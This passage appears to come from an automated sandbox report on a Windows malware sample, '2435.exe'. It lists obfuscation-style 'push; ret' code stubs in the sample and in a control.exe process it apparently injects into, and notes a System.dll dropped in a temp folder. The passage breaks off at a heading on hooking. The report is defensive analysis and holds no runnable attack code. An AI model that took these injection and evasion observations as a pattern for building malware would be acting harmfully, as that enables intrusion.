          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_0041E560 push ss; ret
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_0041CEB5 push eax; ret
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_0041CF6C push eax; ret
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_0041CF02 push eax; ret
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_0041CF0B push eax; ret
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00ACD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0478D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FCCEB5 push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FCCF6C push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FCCF0B push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FCCF02 push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FCE560 push ss; ret
          Source: C:\Users\user\Desktop\2435.exeFile created: C:\Users\user\AppData\Local\Temp\nsq166.tmp\System.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection: